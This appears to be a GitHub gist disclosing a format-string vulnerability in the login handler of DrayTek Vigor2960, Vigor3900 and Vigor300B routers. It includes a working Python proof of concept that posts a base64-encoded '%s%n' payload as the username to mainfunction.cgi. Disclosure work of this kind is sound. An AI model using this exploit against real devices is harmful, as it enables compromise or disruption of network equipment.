Skip to content

Instantly share code, notes, and snippets.

@Cossack9989

Cossack9989/draytek-vigor-fsb-vuln.md Secret

Last active October 20, 2021 07:09
Show Gist options
  • Save Cossack9989/e9c1c2d2e69b773ca4251acdd77f2835 to your computer and use it in GitHub Desktop.
Save Cossack9989/e9c1c2d2e69b773ca4251acdd77f2835 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
draytek-vigor-fsb-vuln.md

Affected devices

Vigor2960, Vigor3900, Vigor300B

Affected firmware version

<= 1.5.1.3

Founder

C0ss4ck @ Bytedance Wuheng Lab

Submit-time

2021-07-21

CVSS Score

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H, 9.0

PoC

from base64 import b64encode
import requests

data = {
 "action": "login",
 "formusername": b64encode(b"%s%s%s%s%s%s%s%s%n%n%n%n%n").decode(),
 "formpassword": b64encode(b"12345678").decode(),
 "formcaptcha": b64encode(b"123456").decode(),
 "rtick": "2345678"
}
header = {
 "Content-Type": "application/raw"
}
url = {
 "root": "http://192.168.1.1:80",
 "cgi": {
  "root": "/cgi-bin",
  "uri": {
   "mf": "/mainfunction.cgi",
  }
 }
}

def build_url(p1, p2=None):
 if p2:
  return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
 else:
  return url["root"] + url[p1]


session = requests.session()
r = session.post(build_url("cgi", "mf"), data=data, headers=header)
print(r)

Details

  • Location: mainfunction.cgi

image image image image

Fix

DrayTek should publish a new firmware

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment